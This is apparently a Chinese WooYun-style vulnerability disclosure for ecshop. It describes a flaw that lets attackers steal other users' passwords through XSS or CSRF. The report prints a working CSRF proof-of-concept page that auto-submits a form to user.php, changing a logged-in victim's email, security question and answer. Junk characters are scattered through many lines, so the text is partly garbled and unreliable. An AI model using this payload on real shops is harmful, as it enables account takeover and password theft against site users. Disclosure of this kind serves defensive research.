简要描述:7 U! W0 _, V. n" T- {" F
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现; M: L% a1 b ]. Z
& W' R! O( z- `1 T7 N
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
4 _% a: E0 ?$ r+ X$ b6 _- a) k
# U+ ~/ j- P$ C3 F1 \详细说明:
! B% b! [( E( I) _: i- A利用csrf和xss可以突破官方所说的“障碍”
& l$ ?7 m) a" }; Vxss版本已经有人说明
. W& _& u7 v: W* y: a5 W3 X: y这里给出csrf版本9 p/ G3 { {! D5 v; e: B! d
1 p8 w' [! o; E0 j漏洞证明:
4 d8 c4 R! J+ `7 h ~6 Q, c4 f4 i<html>
% r( n% t! R( ]2 T4 I9 ?$ `( n<body>! K4 b: m- v9 K5 B
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">: k, H" t' n9 Y. w7 u
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
# G3 a3 T$ l3 P7 l1 ?<INPUT TYPE="text" NAME="act" value="act_edit_profile">/ _0 e4 f1 l1 f% {8 ]& s h
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
D5 C6 _% {% g4 A* d! l. T<INPUT TYPE="text" NAME="passwd_answer" value="exploit">8 e( y) T4 y; k; D: `: L7 P% E
</body>
. f$ R! V0 J& |" h" O* R/ w! M<script>
% n' C( b6 A' P. T# t# odocument.forms[0].submit();+ ?% k; E! f$ h7 K, J* ?7 C( p/ w; N) [
</script>/ z9 m P4 a! k
</html>: E! s E( U+ U C- a
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
3 b6 A6 F: j' M6 g) ~# ]! w% M# v& m
2 R& v! G. s- C: y+ i8 q" H+ q |